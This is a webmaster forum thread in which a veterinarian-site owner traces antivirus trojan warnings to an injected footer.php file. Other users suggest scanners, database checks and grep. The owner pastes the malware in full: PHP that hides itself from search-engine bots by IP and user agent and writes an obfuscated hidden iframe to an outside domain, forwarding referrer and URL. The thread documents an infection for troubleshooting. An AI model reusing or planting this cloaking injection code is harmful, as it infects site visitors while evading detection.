42 replies to this topic

[Dr.Marie]

I've had a few of my Facebook fans tell me that when they click on links to my site that their virus checker is giving them a trojan warning.

A few months ago I found someone had planted malicious code in my header and changed my .htaccess. I'm certain I've cleaned it all.

I have a couple of theories:

1. It's possible that during the 12 hours or so that the virus was there previously, my site got picked up by virus checking companies and is on a list as suspicious. If so, how do I get off of a list?

2. Perhaps another site on my shared hosting plan has a virus and as such my ip is flagged as suspicious? If this is the case, this should be cleared up shortly as I am migrating to a new host soon.

3. Perhaps there still is a virus present. Is there any way I can check for one?

I greatly appreciate any thoughts you guys have!

Marie

[DonnaFontenot]

Have you checked Webmaster tools for any notifications? Or used the Fetch as Googlebot feature there to see if it's showing spammy stuff to Googlebot only?

[Dr.Marie]

Thanks Donna...I have no warnings in WMT. I fetched as Googlebot and nothing looks fishy. I can account for every line of code on the page.

Grrr...

[DonnaFontenot]

Looks ok here: http://www.google.co...vetquestion.com

Ok here: http://safeweb.norton.com/

Ok here: http://www.avg.com.a...b-page-scanner/

[Dr.Marie]

Thanks so much Donna. I appreciate you taking the time to help!

I really think that the people who are getting warnings have not updated their virus definitions. An article of mine was just posted on a major veterinary board and someone commented saying, "Don't click! Avast says the site has a Trojan!" The next person responded saying they had Avast 2012 and got no warning.

[DonnaFontenot]

I think you're right or at least somewhat on the right track. It's bound to be some residual effect from the previous problem. I don't know what the solution is. I guess I'd probably try to find out if there is a blacklist out there that the site is on, but I don't know how to find it.

[DonnaFontenot]

Hmmm...wait a second. This test does say it has malware: http://sitecheck.sucuri.net/scanner/

It's questioning a script on aboutus.php and question_list.php - which contains a url pointing to frankwscanoes [dot] somethingorother

Please don't attempt to go to that site as it is likely ready to infect computers. I've purposely made it non clickable and changed the bit following the dot (which is not com).

You may indeed have an issue.

[Dr.Marie]

What the? Thanks again Donna. I've been getting calls all day from people saying, "I tried to read your article but my antivirus says there is a trojan."

I'm lost as to what to do now. I don't see that code anywhere on my site.

[DonnaFontenot]

I assume you also checked the database? And looked for encrypted code?

[Dr.Marie]

That is a good point. If the bad code was in my database this could explain why the virus message comes up sporadically because my database randomly chooses questions to display on the page.

I'm not sure how to check the database for viruses. I will investigate though.

Donna...do you think this is something you could flesh out for me? I'm quite willing to pay you for your service!

[Dr.Marie]

Donna, that site, sucuri.net offers cleanup and monitoring for further viruses for $90. I'm thinking I'm going to do that unless you feel that you (or I) can do it. Thanks!

[DonnaFontenot]

Oh I definitely won't tackle that. My best buddy Michael cleans sites for a living, so I know how complex it can be to make sure everything gets uncovered. I'd not want to miss anything. He does, however, list some sql statements you can run in his cleaning post - http://smackdown.blo...s-installation/ So you might want to run those first.

[Michael_Martinez]

Marie, make sure you're logged out when you try to check your pages for malware warnings. I have read that some trojans are clever enough to hide themselves from logged in admins.

[glyn]

IS THIS A WP site?

[Dr.Marie]

Good news! The problem is fixed!

I contacted my host and they were able to see and remove the malicious code.

If you are interested, here is what happened. There was a file called footer.php that was inserted in a directory. The directory was one that is used to host files that do calculations for a tool that I created. There should not have been a footer.php in that directory. Here is the file:

<?php

error_reporting(0);
$bot_ips = array("8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80","64.68.81","64.68.82","64.68.83","64.68.84","64.68.85","64.68.86","64.68.87","64.68.88","64.68.89","64.68.90","64.68.91","64.68.92","64.75.36","66.163.170","66.163.174","66.196.101","66.196.65","66.196.67","66.196.72","66.196.73","66.196.74","66.196.77","66.196.78","66.196.80","66.196.81","66.196.90","66.196.91","66.196.92","66.196.93","66.196.97","66.196.99","66.218.65","66.218.70","66.228.164","66.228.165","66.228.166","66.228.173","66.228.182","66.249.64","66.249.65","66.249.66","66.249.67","66.249.68","66.249.69","66.249.70","66.249.71","66.249.72","66.249.73","66.249.78","66.249.79","66.94.230","66.94.232","66.94.233","66.94.238","67.195.115","67.195.34","67.195.37","67.195.44","67.195.45","67.195.50","67.195.51","67.195.52","67.195.53","67.195.54","67.195.58","67.195.98","68.142.195","68.142.203","68.142.211","68.142.212","68.142.230","68.142.231","68.142.240","68.142.246","68.142.249","68.142.250","68.142.251","68.180.216","68.180.250","68.180.251","69.147.79","72.14.199","72.30.101","72.30.102","72.30.103","72.30.104","72.30.107","72.30.110","72.30.111","72.30.124","72.30.128","72.30.129","72.30.131","72.30.132","72.30.133","72.30.134","72.30.135","72.30.142","72.30.161","72.30.177","72.30.179","72.30.213","72.30.214","72.30.215","72.30.216","72.30.221","72.30.226","72.30.252","72.30.54","72.30.56","72.30.60","72.30.61","72.30.65","72.30.78","72.30.79","72.30.81","72.30.87","72.30.9","72.30.97","72.30.98","72.30.99","74.6.11","74.6.12","74.6.13","74.6.131","74.6.16","74.6.17","74.6.18","74.6.19","74.6.20","74.6.21","74.6.22","74.6.23","74.6.24","74.6.240","74.6.25","74.6.26","74.6.27","74.6.28","74.6.29","74.6.30","74.6.31","74.6.65","74.6.66","74.6.67","74.6.68","74.6.69","74.6.7","74.6.70","74.6.71","74.6.72","74.6.73","74.6.74","74.6.75","74.6.76","74.6.79","74.6.8","74.6.85","74.6.86","74.6.87","74.6.9","74.55.27","141.185.209","169.207.238","199.177.18","202.160.178","202.160.179","202.160.180","202.160.181","202.160.183","202.160.185","202.165.96","202.165.98","202.165.99","202.212.5","202.46.19","203.123.188","203.141.52","203.255.234","206.190.43","207.126.239","209.1.12","209.1.13","209.1.32","209.1.38","209.131.40","209.131.41","209.131.48","209.131.49","209.131.50","209.131.51","209.131.60","209.131.62","209.185.108","209.185.122","209.185.141","209.185.143","209.185.253","209.191.123","209.191.64","209.191.65","209.191.82","209.191.83","209.67.206","209.73.176","209.85.238","211.14.8","211.169.241","213.216.143","216.109.121","216.109.126","216.136.233","216.145.58","216.155.198","216.155.200","216.155.202","216.155.204","216.239.193","216.239.33","216.239.37","216.239.39","216.239.41","216.239.45","216.239.46","216.239.51","216.239.53","216.239.57","216.239.59","216.32.237","216.33.229","174.129.130", "94.75.242", "74.55.27");
$bot_agents = array('chrome', 'gtb', 'altavista', 'ask jeeves', 'bingbot', 'download master', 'google', 'php', 'httrack', 'java', 'jeeves', 'libwww-perl', 'listchecker', 'lycos', 'msiecrawler', 'msnbot', 'msnbot-media', 'netcache', 'offline explorer', 'pear', 'python', 'slurp', 'spider', 'teleport pro', 'twiceler', 'webalta', 'webcopier', 'webcrawler', 'webzip', 'wget', 'yahoo', 'yandex');
$good_agents = array('windows', 'macintosh');
$arr = explode(".", $_SERVER["REMOTE_ADDR"]);
$ip = $arr[0].".".$arr[1].".".$arr[2];
$agent = strtolower($_SERVER['HTTP_USER_AGENT']);
$BOT = false;
$c = false;
foreach ( $good_agents as $one )
{
if ( strstr($agent, $one) )
{
  $c = true;
  break;
}
}
if ( !$c )
{
$BOT = true;
}
elseif ( in_array($ip, $bot_ips) )
{
$BOT = true;
}
else
{
foreach ( $bot_agents as $one )
{
  if ( strstr($agent, $one) )
  {
   $BOT = true;
   break;
  }
}
}
$code = '%3Cscript+language%3D%27JavaScript%27%3Edocument.write%28%22%3C%22%2B%22if%22%2B%22ra%22%2B%22me%22%2B%22+src%3D%27http%3A%2F%2F%22%2B%22frankwsa%22%2B%22migos.in%22%2B%22%2Fshowads.php%3F2%26seoref%3D%22%2BencodeURIComponent%28document.referrer%29%2B%22%26HTTP_REFERER%3D%22%2BencodeURIComponent%28document.URL%29%2B%22%27+width%3D%271%27+height%3D%271%27+frameborder%3D%270%27%3E%3C%2F%22%2B%22if%22%2B%22ra%22%2B%22me%22%2B%22%3E%22%29%3B%3C%2Fscript%3E';
$code = urldecode($code);
$code2 = '<script language="JavaScript">
function SetCookie(cookieName,cookieValue,nDays) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
				 + ";expires="+expire.toGMTString()+";path=/";
}
SetCookie("bestourproxydone", "100500", 1);
</script>';
if ( !$BOT && !isset($_COOKIE['bestourproxydone']) )
{
$out = isset($code2) ? $code2."\n".$code : $code;
print $out;
}
?>

I'm guessing that what it does is hide the badness from bots. (Which is likely why my WMT didn't give me a warning.) Then, I'm guessing that what it does is show ads to the user rather than having them see my ads. Sneaky.

My host figures that when I was hacked a few months ago there was an open door that allowed the hackers to plant this code. They said it's also possible that I got infected by accessing my cpanel from an infected PC. Interestingly enough, one of our computers was severely virus infested this week. The computer tech said it was the worst they had seen and it took them 3 days to get the thing off. Who knows if the virus came from my site or if this virus actually infected my site.

I am suspicious that this started shortly after I installed my forum (which is now gone). But I guess I'll never know.

Thanks to all who tried to help!

[Dr.Marie]

As an interesting twist, the nasty footer.php file keeps repopulating itself. For now I have deleted it and created a new blank file called footer.php in the hopes that it will stop the virus from creating a new file. I'm waiting to see what my host says.

[DonnaFontenot]

See, that's why I don't clean sites and don't recommend people do it themselves. A back door was left open and it will keep getting reinfected over and over and over again until all avenues are closed. I've paid attention to the many times that Michael has cleaned sites and the work involved is pretty intense, to make sure nothing is missed.

[Michael_Martinez]

If you're not supposed to have a footer.php file then there should be relatively few references to it in your library of PHP files. If you are using a Linux-based server and IF you can telnet to it and IF you know how to do that, you can probably find the script that is still corrupted by using a command line query similar to this:

grep -r 'footer.php' * > ./footer-report.txt

That would put all its results into the text file "footer-report.txt", which you could download and browse casually. Knowing where the corrupted script is would point you to which theme/plugin directory should be re-installed (or de-installed).

If you try this, be sure to check again after you re-install anything to make sure you're not just installing a corrupted package.

[DonnaFontenot]

Except the reference might be encrypted and stored somewhere in the database, rather than in plain sight in a file.

[Dr.Marie]

My host has found some more corrupted files...all of these are from my wordpress blogs. I feel like a dolt because I changed all of my main passwords but didn't change my wp admin passwords. This is likely part of the problem.

The host says they are going to do a manual audit of the site to see if they can pick up any more bad stuff.

Why on earth do people create viruses like this? Ugh.